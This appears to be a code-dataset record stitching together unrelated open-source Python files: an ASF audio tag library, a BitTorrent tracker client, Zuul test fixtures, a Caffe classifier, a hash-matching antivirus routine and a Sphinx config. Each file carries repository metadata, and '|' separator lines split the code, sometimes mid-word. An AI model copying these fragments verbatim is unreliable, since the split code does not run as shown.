start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.md5sum = str[start:end].decode('utf-8')
else:
self.md5sum = str[start:end]
start = end
end += 4
(self.buffer_size,) = _struct_i.unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
_struct_i = struct.Struct("<i")
_struct_H = struct.Struct("<H")
|
berdario/mutagen
|
mutagen/asf.py
|
Python
|
gpl-2.0
| 21,198
| 0.000849
|
# Copyright 2006-2007 Lukas Lalinsky
# Copyright 2005-2006 Joe Wreschnig
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# $Id: asf.py 4224 2007-12-03 09:01:49Z luks $
"""Read and write ASF (Window Media Audio) files."""
__all__ = ["ASF", "Open"]
from functools import total_ordering
from mutagen import FileType, Metadata
from mutagen._util import insert_bytes, delete_bytes, DictMixin, struct_pack, struct_unpack, text_type, string_types
class error(IOError): pass
class ASFError(error): pass
class ASFHeaderError(error): pass
class ASFInfo(object):
"""ASF stream information."""
def __init__(self):
self.length = 0.0
self.sample_rate = 0
self.bitrate = 0
self.channels = 0
def pprint(self):
s = "Windows Media Audio %d bps, %s Hz, %d channels, %.2f seconds" % (
self.bitrate, self.sample_rate, self.channels, self.length)
return s
class ASFTags(list, DictMixin, Metadata):
"""Dictionary containing ASF attributes."""
def pprint(self):
return "\n".join(["%s=%s" % (k, v) for k, v in self])
def __getitem__(self, key):
"""A list of values for the key.
This is a copy, so comment['title'].append('a title') will not
work.
"""
values = [value for (k, value) in self if k == key]
if not values: raise KeyError(key)
else: return values
def __delitem__(self, key):
"""Delete all values associated with the key."""
to_delete = [x for x in self if x[0] == key]
if not to_delete: raise KeyError(key)
else: list(map(self.remove, to_delete))
def __contains__(self, key):
"""Return true if the key has any values."""
for k, value in self:
if k == key: return True
else: return False
def __setitem__(self, key, values):
"""Set a key's value or values.
Setting a value overwrites all old ones. The value may be a
list of Unicode or UTF
|
-8 strings, or a single Unicode or UTF-8
string.
"""
if no
|
t isinstance(values, list):
values = [values]
try: del(self[key])
except KeyError: pass
for value in values:
if key in _standard_attribute_names:
value = text_type(value)
elif not isinstance(value, ASFBaseAttribute):
if isinstance(value, string_types):
value = ASFUnicodeAttribute(value)
elif isinstance(value, bool):
value = ASFBoolAttribute(value)
elif isinstance(value, int):
value = ASFQWordAttribute(value)
self.append((key, value))
def keys(self):
"""Return all keys in the comment."""
return self and set(next(iter(zip(*self))))
def as_dict(self):
"""Return a copy of the comment data in a real dict."""
d = {}
for key, value in self:
d.setdefault(key, []).append(value)
return d
@total_ordering
class ASFBaseAttribute(object):
"""Generic attribute."""
TYPE = None
def __init__(self, value=None, data=None, language=None,
stream=None, **kwargs):
self.language = language
self.stream = stream
if data:
self.value = self.parse(data, **kwargs)
else:
self.value = value
def data_size(self):
raise NotImplementedError
def __repr__(self):
name = "%s(%r" % (type(self).__name__, self.value)
if self.language:
name += ", language=%d" % self.language
if self.stream:
name += ", stream=%d" % self.stream
name += ")"
return name
def render(self, name):
name = name.encode("utf-16-le") + b"\x00\x00"
data = self._render()
return (struct_pack("<H", len(name)) + name +
struct_pack("<HH", self.TYPE, len(data)) + data)
def render_m(self, name):
name = name.encode("utf-16-le") + b"\x00\x00"
if self.TYPE == 2:
data = self._render(dword=False)
else:
data = self._render()
return (struct_pack("<HHHHI", 0, self.stream or 0, len(name),
self.TYPE, len(data)) + name + data)
def render_ml(self, name):
name = name.encode("utf-16-le") + b"\x00\x00"
if self.TYPE == 2:
data = self._render(dword=False)
else:
data = self._render()
return (struct_pack("<HHHHI", self.language or 0, self.stream or 0,
len(name), self.TYPE, len(data)) + name + data)
def __lt__(self, other):
return self.value < other
def __eq__(self, other):
return self.value == other
class ASFUnicodeAttribute(ASFBaseAttribute):
"""Unicode string attribute."""
TYPE = 0x0000
def parse(self, data):
return data.decode("utf-16-le").strip("\x00")
def _render(self):
return self.value.encode("utf-16-le") + b"\x00\x00"
def data_size(self):
return len(self.value) * 2 + 2
def __str__(self):
return self.value
__hash__ = ASFBaseAttribute.__hash__
class ASFByteArrayAttribute(ASFBaseAttribute):
"""Byte array attribute."""
TYPE = 0x0001
def parse(self, data):
return data
def _render(self):
return self.value
def data_size(self):
return len(self.value)
def __str__(self):
return "[binary data (%s bytes)]" % len(self.value)
def __lt__(self, other):
return str(self) < other
def __eq__(self, other):
return str(self) == other
__hash__ = ASFBaseAttribute.__hash__
class ASFBoolAttribute(ASFBaseAttribute):
"""Bool attribute."""
TYPE = 0x0002
def parse(self, data, dword=True):
if dword:
return struct_unpack("<I", data)[0] == 1
else:
return struct_unpack("<H", data)[0] == 1
def _render(self, dword=True):
if dword:
return struct_pack("<I", int(self.value))
else:
return struct_pack("<H", int(self.value))
def data_size(self):
return 4
def __bool__(self):
return self.value
def __str__(self):
return str(self.value)
__hash__ = ASFBaseAttribute.__hash__
class ASFDWordAttribute(ASFBaseAttribute):
"""DWORD attribute."""
TYPE = 0x0003
def parse(self, data):
return struct_unpack("<L", data)[0]
def _render(self):
return struct_pack("<L", self.value)
def data_size(self):
return 4
def __int__(self):
return self.value
def __str__(self):
return str(self.value)
__hash__ = ASFBaseAttribute.__hash__
class ASFQWordAttribute(ASFBaseAttribute):
"""QWORD attribute."""
TYPE = 0x0004
def parse(self, data):
return struct_unpack("<Q", data)[0]
def _render(self):
return struct_pack("<Q", self.value)
def data_size(self):
return 8
def __int__(self):
return self.value
def __str__(self):
return str(self.value)
__hash__ = ASFBaseAttribute.__hash__
class ASFWordAttribute(ASFBaseAttribute):
"""WORD attribute."""
TYPE = 0x0005
def parse(self, data):
return struct_unpack("<H", data)[0]
def _render(self):
return struct_pack("<H", self.value)
def data_size(self):
return 2
def __int__(self):
return self.value
def __str__(self):
return str(self.value)
__hash__ = ASFBaseAttribute.__hash__
class ASFGUIDAttribute(ASFBaseAttribute):
"""GUID attribute."""
TYPE = 0x0006
def parse(self, data):
return data
def _render(self):
return self.value
def data_size(self):
return len(self.value)
def __str__(self):
return self.value
__hash__ = ASFBaseAttribute.__hash__
UNICODE = ASFUnicodeAttribute.TYPE
BYTEARRAY = ASFByteArrayAttribute.TYPE
BOOL = ASF
|
ergonomica/ergonomica
|
tests/stdlib/test_help.py
|
Python
|
gpl-2.0
| 375
| 0.010667
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
[tests/stdlib/test_help.py]
Test the help command.
"""
im
|
port u
|
nittest
#import os
#from ergonomica import ergo, ENV
class TestHelp(unittest.TestCase):
"""Tests the 'help' command."""
def test_list_commands(self):
"""
Tests listing all commands using the 'help commands' command.
"""
|
SOM-st/PySOM
|
src/som/primitives/true_primitives.py
|
Python
|
mit
| 1,649
| 0.003032
|
from som.interp_type import is_ast_interpreter
from som.primitives.primitives import Primitives
from som.vm.globals import trueObject, falseObject, nilObject
from som.vmobjects.primitive import UnaryPrimitive, BinaryPrimitive, TernaryPrimitive
if is_ast_interpreter():
from som.vmobjects.block_ast import AstBlock as _Block
else:
from som.vmobjects.block_bc import BcBlock as _Block
def _not(_rcvr):
return falseObject
def _or(_rcvr, _arg):
return trueObject
def _and_and_if_true(_rcvr, arg):
if isinstance(arg, _Block):
block_method = arg.get_method()
return block_method.invoke_1(arg)
return arg
def _if_false(_rcvr, _arg):
return nilObject
def _if_true_if_false(_rcvr, true_block, _false_block):
if isinstance(true_block, _Block):
block_method = true_block.get_method()
return block_method.invoke_1(true_block)
return true_block
class TruePrimitivesBase(Primitives):
def install_primitives(self):
self._install_instance_primitive(UnaryPrimitive("not", _not))
self._install_instance_primi
|
tive(BinaryPrimitive("or:", _or))
self._install_instance_primitive(BinaryPrimitive("||", _or))
|
self._install_instance_primitive(BinaryPrimitive("and:", _and_and_if_true))
self._install_instance_primitive(BinaryPrimitive("&&", _and_and_if_true))
self._install_instance_primitive(BinaryPrimitive("ifTrue:", _and_and_if_true))
self._install_instance_primitive(BinaryPrimitive("ifFalse:", _if_false))
self._install_instance_primitive(
TernaryPrimitive("ifTrue:ifFalse:", _if_true_if_false)
)
|
wikimedia/integration-zuul
|
tests/base.py
|
Python
|
apache-2.0
| 52,328
| 0.000191
|
#!/usr/bin/env python
# Copyright 2012 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from six.moves import configparser as ConfigParser
import gc
import hashlib
import json
import logging
import os
import pprint
from six.moves import queue as Queue
from six.moves import urllib
import random
import re
import select
import shutil
from six.moves import reload_module
import socket
import string
import subprocess
import swiftclient
import threading
import time
import git
import gear
import fixtures
import statsd
import testtools
from git import GitCommandError
import zuul.connection.gerrit
import zuul.connection.smtp
import zuul.scheduler
import zuul.webapp
import zuul.rpclistener
import zuul.launcher.gearman
import zuul.lib.swift
import zuul.merger.client
import zuul.merger.merger
import zuul.merger.server
import zuul.reporter.gerrit
import zuul.reporter.smtp
import zuul.source.gerrit
import zuul.trigger.gerrit
import zuul.trigger.timer
import zuul.trigger.zuultrigger
FIXTURE_DIR = os.path.join(os.path.dirname(__file__),
'fixtures')
USE_TEMPDIR = True
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s %(name)-32s '
'%(levelname)-8s %(message)s')
def repack_repo(path):
cmd = ['git', '--git-dir=%s/.git' % path, 'repack', '-afd']
output = subprocess.Popen(cmd, close_fds=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out = output.communicate()
if output.returncode:
raise Exception("git repack returned %d" % output.returncode)
return out
def random_sha1():
return hashlib.sha1(str(random.random())).hexdigest()
def iterate_timeout(max_seconds, purpose):
start = time.time()
count = 0
while (time.time() < start + max_seconds):
count += 1
yield count
time.sleep(0)
raise Exception("Timeout waiting for %s" % purpose)
class ChangeReference(git.Reference):
_common_path_default = "refs/changes"
_points_to_commits_only = True
class FakeChange(object):
categories = {'APRV': ('Approved', -1, 1),
'CRVW': ('Code-Review', -2, 2),
'VRFY': ('Verified', -2, 2)}
def __init__(self, gerrit, number, project, branch, subject,
status='NEW', upstream_root=None):
self.gerrit = gerrit
self.reported = 0
self.queried = 0
self.patchsets = []
self.number = number
self.project = project
self.branch = branch
self.subject = subject
self.latest_patchset = 0
self.depends_on_change = None
self.needed_by_changes = []
self.fail_merge = False
self.messages = []
self.data = {
'branch': branch,
'comments': [],
'commitMessage': subject,
'createdOn': time.time(),
'id': 'I' + random_sha1(),
'lastUpdated': time.time(),
'number': str(number),
'open': status == 'NEW',
'owner': {'email': 'user@example.com',
'name': 'User Name',
'username': 'username'},
'patchSets': self.patchsets,
'project': project,
'status': status,
'subject': subject,
'submitRecords': [],
'url': 'https://hostname/%s' % number}
self.upstream_root = upstream_root
self.addPatchset()
self.data['submitRecords'] = self.getSubmitRecords()
self.open = status == 'NEW'
def add_fake_change_to_repo(self, msg, fn, large):
path = os.path.join(self.upstream_root, self.project)
repo = git.Repo(path)
ref = ChangeReference.create(repo, '1/%s/%s' % (self.number,
self.latest_patchset),
'refs/tags/init')
repo.head.reference = ref
zuul.merger.merger.reset_repo_to_head(repo)
repo.git.clean('-x', '-f', '-d')
path = os.path.join(self.upstream_root, self.project)
if not large:
fn = os.path.join(path, fn)
f = open(fn, 'w')
f.write("test %s %s %s\n" %
(self.branch, self.number, self.latest_patchset))
f.close()
repo.index.add([fn])
else:
for fni in range(100):
fn = os.path.join(path, str(fni))
f = open(fn, 'w')
for ci in range(4096):
f.write(random.choice(string.printable))
f.close()
repo.index.add([fn])
r = repo.index.commit(msg)
repo.head.reference = 'master'
zuul.merger.merger.reset_repo_to_head(repo)
repo.git.clean('-x', '-f', '-d')
repo.heads['master'].checkout()
return r
def addPatchset(self, files=[], large=False):
self.latest_patchset += 1
if files:
fn = files[0]
else:
|
fn = '%s-%s' % (self.branch.replace('/', '_'), self.number)
msg = self.subject + '-' + str(self.latest_patchset)
c = self.add_fake_change_to_repo(msg, fn, large)
ps_files = [{'file': '/COMMIT_MSG',
|
'type': 'ADDED'},
{'file': 'README',
'type': 'MODIFIED'}]
for f in files:
ps_files.append({'file': f, 'type': 'ADDED'})
d = {'approvals': [],
'createdOn': time.time(),
'files': ps_files,
'number': str(self.latest_patchset),
'ref': 'refs/changes/1/%s/%s' % (self.number,
self.latest_patchset),
'revision': c.hexsha,
'uploader': {'email': 'user@example.com',
'name': 'User name',
'username': 'user'}}
self.data['currentPatchSet'] = d
self.patchsets.append(d)
self.data['submitRecords'] = self.getSubmitRecords()
def getPatchsetCreatedEvent(self, patchset):
event = {"type": "patchset-created",
"change": {"project": self.project,
"branch": self.branch,
"id": "I5459869c07352a31bfb1e7a8cac379cabfcb25af",
"number": str(self.number),
"subject": self.subject,
"owner": {"name": "User Name"},
"url": "https://hostname/3"},
"patchSet": self.patchsets[patchset - 1],
"uploader": {"name": "User Name"}}
return event
def getChangeRestoredEvent(self):
event = {"type": "change-restored",
"change": {"project": self.project,
"branch": self.branch,
"id": "I5459869c07352a31bfb1e7a8cac379cabfcb25af",
"number": str(self.number),
"subject": self.subject,
"owner": {"name": "User Name"},
"url": "https://hostname/3"},
"restorer": {"name": "User Name"},
"patchSet": self.patchsets[-1],
"reason": ""}
return event
def getChangeAbandonedEvent(self):
event = {"type": "change-abandoned",
"change": {"project": self.project,
"branch": self.branch,
"id": "I5459869c07352a31bfb1e7a8cac379cabfcb25
|
dgschwend/hls_OO
|
TESTDATA_MAXI/data/classify.py
|
Python
|
gpl-3.0
| 14,639
| 0.012637
|
#!/usr/bin/env python2
# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved.
"""
Classify an image using individual model files
Use this script as an example to build your own tool
"""
import argparse
import os
import time
import struct
from google.protobuf import text_format
import numpy as np
import PIL.Image
import scipy.misc, scipy.ndimage
os.environ['GLOG_minloglevel'] = '2' # Suppress most caffe output
import caffe
from caffe.proto import caffe_pb2
def get_net(caffemodel, deploy_file, use_gpu=True):
"""
Returns an instance of caffe.Net
Arguments:
caffemodel -- path to a .caffemodel file
deploy_file -- path to a .prototxt file
Keyword arguments:
use_gpu -- if True, use the GPU for inference
"""
if use_gpu:
caffe.set_mode_gpu()
# load a new model
return caffe.Net(deploy_file, caffemodel, caffe.TEST)
# def get_transformer(deploy_file, mean_file=None):
# """
# Returns an instance of caffe.io.Transformer
#
# Arguments:
# deploy_file -- path to a .prototxt file
#
# Keyword arguments:
# mean_file -- path to a .binaryproto file (optional)
# """
# network = caffe_pb2.NetParameter()
# with open(deploy_file) as infile:
# text_format.Merge(infile.read(), network)
#
# if network.input_shape:
# dims = network.input_shape[0].dim
# else:
# dims = network.input_dim[:4]
#
# t = caffe.io.Transformer(
# inputs = {'data': dims}
# )
# #t.set_transpose('data', (2,0,1)) # transpose to (channels, height, width)
#
# # color images
# if dims[1] == 3:
# # channel swap
# t.set_channel_swap('data', (2,1,0))
# pass
#
# # MEAN SUBTRACT
# #t.set_mean('data', np.array([104, 117, 123]))
#
# return t
def load_image(path, height, width, mode='RGB'):
"""
Load an image from disk
Returns an np.ndarray (channels x width x height)
Arguments:
path -- path to an image on disk
width -- resize dimension
height -- resize dimension
Keyword arguments:
mode -- the PIL mode that the image should be converted to
(RGB for color or L for grayscale)
"""
image = PIL.Image.open(path)
image = image.convert(mode)
image = np.array(image)
# half-crop, half-fill
height_ratio = float(image.shape[0])/height
width_ratio = float(image.shape[1])/width
new_ratio = (width_ratio + height_ratio) / 2.0
resize_width = int(round(image.shape[1] / new_ratio))
resize_height = int(round(image.shape[0] / new_ratio))
if width_ratio > height_ratio and (height - resize_height) % 2 == 1:
resize_height += 1
elif width_ratio < height_ratio and (width - resize_width) % 2 == 1:
resize_width += 1
image = scipy.misc.imresize(image, (resize_height, resize_width), interp='bicubic')
if width_ratio > height_ratio:
start = int(round((resize_width-width)/2.0))
image = image[:,start:start+width]
else:
start = int(round((resize_height-height)/2.0))
image = image[start:start+height,:]
# fill ends of dimension that is too short with random noise
if width_ratio > height_ratio:
padding = (height - resize_height)/2
noise_size = (padding, width, 3)
noise = np.random.randint(0, 255, noise_size).astype('uint8')
image = np.concatenate((noise, image, noise), axis=0)
else:
padding = (width - resize_width)/2
noise_size = (height, padding, 3)
noise = np.random.randint(0, 255, noise_size).astype('uint8')
image = np.concatenate((noise, image, noise), axis=1)
processed = np.zeros((3, width, height), np.float32)
# Transpose from (height, width, channels) to (channels, height, width)
#processed = processed.transpose((2,0,1))
# Channel Swap: RGB -> BGR
#image = image[(2,1,0),:,:]
# Subtract Mean, Swap Channels RGB -> BGR, Transpose (H,W,CH) to (CH,H,W)
#mean_rgb = [104,117,123]
processed[0,:,:] = (image[:,:,2]-104.0)
processed[1,:,:] = (image[:,:,1]-117.0)
processed[2,:,:] = (image[:,:,0]-123.0)
return processed
def forward_pass(image, net, batch_size=None):
"""
Returns scores for each image as an np.ndarray (nImages x nClasses)
Arguments:
images -- a list of np.ndarrays
net -- a caffe.Net
transformer -- a caffe.io.Transformer
Keyword arguments:
batch_size -- how many images can be processed at once
(a high value may result in out-of-memory errors)
"""
net.blobs['data'].data[0] = image
print "net.outputs[-1] = ", net.outputs[-1]
start = time.time()
net.forward()
output = net.blobs[net.outputs[-1]].data
#pool10avg = (net.blobs['pool10'].data).flatten()
#pool10 = pool10avg
#print "conv10 o
|
utput:\n", net.blobs['conv10'].data
#print "pool10 output:", pool10avg
scores = np.copy(output)
end = time.t
|
ime()
print 'Inference took %f seconds ...' % (end - start)
return scores
def read_labels(labels_file):
"""
Returns a list of strings
Arguments:
labels_file -- path to a .txt file
"""
if not labels_file:
return None
labels = []
with open(labels_file) as infile:
for line in infile:
label = line.strip()
if label:
labels.append(label)
assert len(labels), 'No labels found'
return labels
def classify(caffemodel, deploy_file, image_file,
mean_file=None, labels_file=None, batch_size=None, use_gpu=True):
"""
Classify some images against a Caffe model and print the results
Arguments:
caffemodel -- path to a .caffemodel
deploy_file -- path to a .prototxt
image_files -- list of paths to images
Keyword arguments:
mean_file -- path to a .binaryproto
labels_file path to a .txt file
use_gpu -- if True, run inference on the GPU
"""
# Load the model and images
net = get_net(caffemodel, deploy_file, use_gpu)
_, channels, height, width = np.array(net.blobs['data'].shape)
mode = 'RGB'
image = load_image(image_file, height, width, mode)
labels = read_labels(labels_file)
# Structured Input as Image
#W = image.shape[2]
#H = image.shape[1]
#CH = image.shape[0]
#for y in range(H):
# for x in range(W):
# for c in range(CH):
# image[c,x,y] = 1000.0*y+x+c/1000.0#1;
#
# Fixed Parameters for first Filter Bank
# conv1param = np.array(net.params['conv1'][0].data)[:,:,:,:]
# print "shape of conv1param: ", conv1param.shape
# co = conv1param.shape[0]
# ci = conv1param.shape[1]
# kx = conv1param.shape[2]
# ky = conv1param.shape[3]
# pixels = []
# for i in range(ci):
# for o in range(co):
# if i == 0:
# conv1param[o,i] = np.array([[0,0,0],[0,1,0],[0,0,0]])
# else:
# conv1param[o,i] = np.zeros((3,3)) #conv1param[o,i] = np.array([[1,0,0],[0,1,0],[0,1,0]])
#net.params['conv1'][0].data[...] = conv1param
#net.params['conv1'][1].data[...] = np.zeros(net.params['conv1'][1].shape)
# Classify the image
scores = forward_pass(image, net, batch_size=1)
# Fish out some blobs...
indata = np.array(net.blobs['data'].data)[0,:,:,:]
print "shape of indata: ", indata.shape
CH = indata.shape[0]
W = indata.shape[1]
H = indata.shape[2]
pixels = []
for y in range(H):
for x in range(W):
for c in range(CH):
pixel = indata[c,x,y]
if pixel is None: pixel = 99999
pixels.append(pixel);
# Write Pixels to binary file
print("Write to indata File...")
floatstruct = struct.pack('f'*len(pixels), *pixels)
with open("indata.bin", "wb") as f:
f.write(floatstruct)
# Fish out some Parameters...
conv1param = np.array(net.params['conv1'][0].data)[:,:,:,:]
print "shape of conv1param: ", conv1param.shape
co = conv1param.shape[0]
ci = conv1param.shape[1]
kx = conv1param.shape[2]
ky = conv1param.shape[3]
|
mgp/bittorrent-dissected
|
Rerequester.py
|
Python
|
mit
| 9,039
| 0.006195
|
# Written by Bram Cohen
# see LICENSE.txt for license information
from zurllib import urlopen, quote
from btformats import check_peers
from bencode import bdecode
from threading import Thread, Lock
from socket import error, gethostbyname
from time import time
from random import randrange
from binascii import b2a_hex
class Rerequester:
def __init__(self, url, interval, sched, howmany, minpeers,
connect, externalsched, amount_left, up, down,
port, ip, myid, infohash, timeout, errorfunc, maxpeers, doneflag,
upratefunc, downratefunc, ever_got_incoming):
# The URL and query paramters to always pass.
self.url = ('%s?info_hash=%s&peer_id=%s&port=%s&key=%s' %
(url, quote(infohash), quote(myid), str(port),
b2a_hex(''.join([chr(randrange(256)) for i in xrange(4)]))))
# The IP address of this client.
self.ip = ip
# The time in seconds between requesting more peers.
self.interval = interval
# The last time this client got a reply from the tracker.
self.last = None
# The identifier returned by the tracker, which this client uses on subsequent requests.
self.trackerid = None
# Maximum seconds between sending requests to the tracker.
self.announce_interval = 30 * 60
# Function to schedule events in the reactor loop of RawServer.
self.sched = sched
# Method that returns how many peers this client is connected to.
self.howmany = howmany
# If connected to this many peers, may skip making a request to the tracker.
self.minpeers = minpeers
# Method on Connecter that starts a connection to a peer.
self.connect = connect
# Function to schedule events in the reactor loop of RawServer.
self.externalsched = externalsched
# Method to get the amount of data left.
self.amount_left = amount_left
# Method to get the total bytes uploaded.
self.up = up
# Method to get the total bytes downloaded.
self.down = down
# HTTP timeout when making a request to the tracker.
self.timeout = timeout
# Callback invoked with a string describing any error.
self.errorfunc = errorfunc
# If connected to this many peers, will not request any more from the tracker.
self.maxpeers = maxpeers
# Flag set if we have all pieces and are seeding.
self.doneflag = doneflag
# Method to get the upload rate.
self.upratefunc = upratefunc
# Method to get the download rate.
self.downratefunc = downratefunc
# Method that returns True if we ever got an incoming connection.
self.ever_got_incoming = ever_got_incoming
# True if the last request to the tracker failed.
self.last_failed = True
# The last time this client made a request to the tracker.
self.last_time = 0
def c(self):
# Call this method again later.
self.sched(self.c, self.interval)
# Determine if we need more peers from the tracker.
if self.ever_got_incoming():
# Got an incoming connection.
getmore = self.howmany() <= self.minpeers / 3
else:
# Never got an incoming connection.
# Assume this client is behind a NAT, and aggressively try and connect to other peers.
getmore = self.howmany() < self.minpeers
if getmore or time() - self.last_time > self.announce_interval:
# Need to connect to more peers, or need to simply check-in with the tracker.
self.announce()
def begin(self):
# Method c is the method called at regular intervals to contact the tracker.
self.sched(self.c, self.interval)
# But contact the tracker now. Setting event = 0 specifies starting the download.
self.announce(0)
def announce(self, event = None):
# Update the time we last made a request to the tracker.
self.last_time = time()
# Append total uploaded, total downloaded, and bytes left to download.
s = ('%s&uploaded=%s&downloaded=%s&left=%s' %
(self.url, str(self.up()), str(self.down()),
str(self.amount_left())))
if self.last is not None:
# Append the last time this client made a request to the tracker.
s += '&last=' + quote(str(self.last))
if self.trackerid is not None:
|
# If not the first request, append the id this tracker previously returned.
s += '&trackerid=' + quote(str(
|
self.trackerid))
if self.howmany() >= self.maxpeers:
# Don't need any more peers to connect to.
s += '&numwant=0'
else:
# Return peer IP and port addresses in 6 binary bytes.
s += '&compact=1'
# Event is not specified if this request is one performed at regular intervals.
if event != None:
s += '&event=' + ['started', 'completed', 'stopped'][event]
# Method that returns True the first time and False every subsequent time.
set = SetOnce().set
def checkfail(self = self, set = set):
if set():
# Only get here if the tracker did not reply and call set() in rerequest first.
if self.last_failed and self.upratefunc() < 100 and self.downratefunc() < 100:
self.errorfunc('Problem connecting to tracker - timeout exceeded')
self.last_failed = True
# Method checkfail will run if the tracker does not reply to this request.
self.sched(checkfail, self.timeout)
Thread(target = self.rerequest, args = [s, set]).start()
def rerequest(self, url, set):
# url is s from method announce.
try:
if self.ip:
# Include our IP address in case we are communicating through a proxy.
url += '&ip=' + gethostbyname(self.ip)
# Read a reply.
h = urlopen(url)
r = h.read()
h.close()
if set():
# Only get here if checkfail did not run and call set() first.
def add(self = self, r = r):
# This call succeeded.
self.last_failed = False
# Process the reply.
self.postrequest(r)
self.externalsched(add, 0)
except (IOError, error), e:
if set():
# Only get here if checkfail did not run and call set() first.
def fail(self = self, r = 'Problem connecting to tracker - ' + str(e)):
if self.last_failed:
self.errorfunc(r)
self.last_failed = True
self.externalsched(fail, 0)
def postrequest(self, data):
try:
r = bdecode(data)
check_peers(r)
if r.has_key('failure reason'):
self.errorfunc('rejected by tracker - ' + r['failure reason'])
else:
if r.has_key('warning message'):
self.errorfunc('warning from tracker - ' + r['warning message'])
self.announce_interval = r.get('interval', self.announce_interval)
self.interval = r.get('min interval', self.interval)
self.trackerid = r.get('tracker id', self.trackerid)
self.last = r.get('last')
p = r['peers']
peers = []
if type(p) == type(''):
# Deserialize the compact binary form.
for x in xrange(0, len(p), 6):
ip = '.'.join([str(ord(i)) for i in p[x:x+4]])
port = (ord(p[x+4]) << 8) | ord(p[x+5])
peers.append((ip, port, None))
else:
for x in p:
peers.append((x['ip'], x['port'], x.get('peer id')))
ps = len(peers) + self.howmany()
if ps < self.maxpeers:
if self.donefla
|
miho030/FoxVc
|
versions - 1.2.x/FoxVc Ver 1.2.7/Foxcore/matchingHashValue.py
|
Python
|
gpl-3.0
| 1,103
| 0.024679
|
# -*- coding: utf-8 -*-
# Author : Repubic of Korea, Seoul, JungSan HS 31227 Lee Joon Sung
# Author_Helper : Republic of Korea, KyungGido, Kim Min Seok
# youtube : anonymous0korea0@gmail.com ;;;; tayaka
# Email : miho0_0@naver.com
import hashlib
import logging
#from FoxDBinfor import DB_Pattern
def Matching_Hash_Value(fname, File_Hash_List):
logger = logging.getLogger("FoxVc")
slogger = logging.getLogger("Scan")
blacklist = ["bin", "BIN", "$RECYCLE", "$RECYCLE.BIN"] # 휴지통을 블랙리스트로 넣음
try:
with open(fname, 'rb') as f:
buf = f.read()
md5 = hashlib.md5()
md5.update(buf)
# end with-open
fmd5 = md5.hexdigest()
for hashValue in File_Hash_List: # for문으로 리스트를 돌림.
if fmd5 == hashValue: # 만약 파일의 md5해시가 멀웨어 DB에 존재한다면..
#INFECT
|
ION.append(fname) # INFECTION 리스트에 추가함.
return 1
return 0
except IOError as e:
|
logger.error("IOError : Permission denied. / No such file or directory.")
logger.error(e.message)
finally:
pass
|
devs1991/test_edx_docmode
|
venv/lib/python2.7/site-packages/ipware/__init__.py
|
Python
|
agpl-3.0
| 93
| 0
|
# -*- c
|
oding: utf-8 -*-
__version__ = '1.1.0'
default_app_config = 'ipware.apps.App
|
Config'
|
ntuhpc/modulefiles
|
all/hide.py
|
Python
|
mit
| 413
| 0
|
impo
|
rt os
root_dir = os.path.dirname(os.path.realpath(__file__))
f = open(".modulerc", "w")
f.write("#%Module\n")
sub_dirs = os.walk(root_dir)
next(sub_dirs)
for dir_name, _, file_list in sub_dirs:
for file_name in file_list:
module_version = file_name.rstrip("
|
.lua")
module_name = os.path.relpath(dir_name, root_dir)
f.write("hide-version %s/%s\n" % (module_name, module_version))
|
goldsborough/ecstasy
|
docs/source/conf.py
|
Python
|
mit
| 9,617
| 0.005303
|
# -*- coding: utf-8 -*-
#
# ecstasy documentation build configuration file, created by
# sphinx-quickstart on Wed Aug 5 21:42:49 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import alabaster
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../../'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
needs_sphinx = '1.3'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.mathjax',
'sphinx.ext.viewcode',
'sphinx.ext.napoleon'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'ecstasy'
copyright = u'2015, Peter Goldsborough'
author = u'Peter Goldsborough'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1'
# The full version, including alpha/beta/rc tags.
release = '1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
